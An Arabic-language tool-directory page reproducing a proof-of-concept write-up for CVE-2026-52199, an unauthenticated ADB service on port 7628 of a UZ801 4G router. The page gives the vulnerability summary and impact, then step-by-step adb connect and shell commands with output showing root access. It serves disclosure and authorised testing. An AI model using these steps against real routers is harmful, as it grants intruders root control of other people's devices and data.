Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/lamaper/cve-2026-52199
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأداة الوصول عن بعدمختبرات وتدريب عملي
GitHublamaper/cve-2026-52199

CVE-2026-52199

استغلال إثبات المفهوم لـ CVE-2026-52199: تنفيذ تعليمات برمجية عن بُعد دون مصادقة عبر خدمة ADB المكشوفة على راوتر UZ801 4G LTE. يتضمن تحليل الثغرة، وتقييم الأثر، ودليل استغلال خطوة بخطوة للاختبار الأمني المصرح به.

منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CVE-2026-52199 : تنفيذ كود عن بُعد غير مصادق عليه في راوتر UZ801 4G

ملخص الثغرة

توجد ثغرة حرجة من نوع التحكم غير الصحيح في الوصول (Incorrect Access Control) في راوتر UZ801_v2.1 4G LTE من نوع Generic OEM (البرنامج الثابت V3.4.3). يقوم الجهاز بشكل غير صحيح بتعريض برنامج خفي غير مصادق عليه لـ Android Debug Bridge (ADB) (/sbin/adbd) على منفذ TCP 7628 للشبكة المجاورة (LAN/WiFi).

hardware_pcb

يمكن للمهاجم المتصل بالشبكة المحلية للجهاز استغلال هذا الخلل لتجاوز جميع آليات المصادقة، وإنشاء اتصال ADB، وتنفيذ كود تعسفي بصلاحيات الجذر (root).

evidence

المنتج المتأثر

  • المورّد: Generic OEM / White-label ecosystem
  • المنتج: UZ801_v2.1 4G LTE Router
  • الإصدار: V3.4.3
  • المكوّن المعرّض للثغرة: /sbin/adbd

التأثير

يؤدي استغلال هذه الثغرة إلى اختراق كامل للنظام. يشمل التأثير:

  • تنفيذ الكود عن بُعد (RCE): True
  • تصعيد الصلاحيات: True (يصلك مباشرة إلى صدفة root)
  • كشف المعلومات: True (وصول كامل إلى نظام الملفات الداخلي وبيانات الاعتماد)
  • حرمان الخدمة (DoS): True (القدرة على إتلاف الجهاز أو التلاعب به)

إثبات المفهوم (PoC)

لا تتطلب عملية الاستغلال أي أدوات خاصة بخلاف عميل adb القياسي والوصول إلى الشبكة المجاورة.

الخطوة 1: اتصل بشبكة WiFi الخاصة بجهاز التوجيه UZ801 (البوابة الافتراضية عادةً هي 192.168.100.1).

الخطوة 2: افحص الجهاز بحثًا عن المنافذ المفتوحة. سيظهر المنفذ 7628/TCP كمفتوح.

الخطوة 3: من جهاز المهاجم، ابدأ اتصال ADB بالمنفذ غير الموثّق:

root@kitploit:~
$ adb connect 192.168.100.1:7628
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.100.1:7628

الخطوة 4: اطلب صدفة تفاعلية:

root@kitploit:~
$ adb -s 192.168.100.1:7628 shell

الخطوة 5: يصل المهاجم مباشرة إلى صدفة root دون أي مطالبات مصادقة:

root@kitploit:~
root@msm8916_32_512:/ # id
uid=0(root) gid=0(root) context=u:r:su:s0
root@msm8916_32_512:/ # uname -a
Linux localhost 3.10.49 #1 SMP PREEMPT ... aarch64

إخلاء المسؤولية

لأغراض تعليمية وأبحاث أمنية مصرح بها فقط. المعلومات وإثبات المفهوم المقدمة في هذا المستودع مخصصة فقط للأغراض التعليمية ولمساعدة تأمين الشبكات. المؤلف (lamaper) غير مسؤول عن أي إساءة استخدام لهذه المعلومات. لا تستخدم هذا الاستغلال ضد أجهزة أو شبكات لا تملكها أو ليس لديك إذن صريح لاختبارها.

تنزيل الأداة